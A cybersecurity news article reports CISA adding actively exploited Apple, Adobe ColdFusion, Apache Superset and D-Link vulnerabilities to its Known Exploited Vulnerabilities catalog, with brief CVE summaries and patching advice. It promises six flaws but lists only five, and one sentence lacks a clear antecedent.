The U.S. Cybersecurity and Infrastructure Security Agency has added to its to the Known Exploited Vulnerabilities catalog six vulnerabilities that impact products from Apple, Adobe, Apache, D-Link, and Joomla.
The Known Exploited Vulnerabilities catalog, or KEV for short, contains security issues that have been actively exploited in the wild.
It is a valuable resource for organizations across the globe in the vulnerability management and prioritization process.
CISA has given federal agencies until January 29 to patch the six actively exploited flaws or stop using the vulnerable products.
CVE-2023-27524 - Insecure default initialization of resource impacting Apache Superset versions up to 2.0.1.
The vulnerability exists when the default configured SECRET KEY is not altered, allowing an attacker to authenticate and access unauthorized resources.
CVE-2023-41990 - Remote code execution flaw in the processing of a font file sent as an iMessage attachment, leading to arbitrary code execution on Apple iPhone devices running iOS 16.2 and older.
CVE-2023-38203 - Deserialization of untrusted data in Adobe ColdFusion versions 2018u17 and earlier, 2021u7 and earlier, and 2023u1 and earlier, leading to arbitrary code execution without user interaction.
CVE-2023-29300 - Deserialization of untrusted data in Adobe ColdFusion versions 2018u16 and earlier, 2021u6 and earlier, and 2023.0.0.330468 and earlier, leading to arbitrary code execution without user interaction.
CVE-2016-20017 - Remote unauthenticated command injection vulnerability in D-Link DSL-2750B devices before 1.05, actively exploited from 2016 through 2022.
Some of the listed flaws have been leveraged in attacks that were disclosed only recently.
This is the last in the set of four vulnerabilities a threat actor exploited to bypass security measures in iPhones belonging to several targets around the world, including Europe.
CVE-2023-38203 and CVE-2023-29300 were leveraged by hackers since mid-2023 after security researchers demonstrated that the vendor's patches could be bypassed.
For others, like CVE-2023-27524, proof-of-concept exploits were released last September, laying the ground for widespread exploitation by malicious actors.
Organizations and federal agencies are urged to check their assets for the above flaws, and other vulnerabilities listed in the KEV catalog, and apply the available security updates or mitigation steps as required.
CISA warns of actively exploited bugs in Chrome and Excel parsing library.
Hackers breach US govt agencies using Adobe ColdFusion exploit.
CISA warns of actively exploited Windows, Sophos, and Oracle bugs.
Apache OFBiz RCE flaw exploited to find vulnerable Confluence servers.
CISA urges tech manufacturers to stop using default passwords.
This Cyber News was published on www.bleepingcomputer.com. Publication date: Tue, 09 Jan 2024 19:35:23 +0000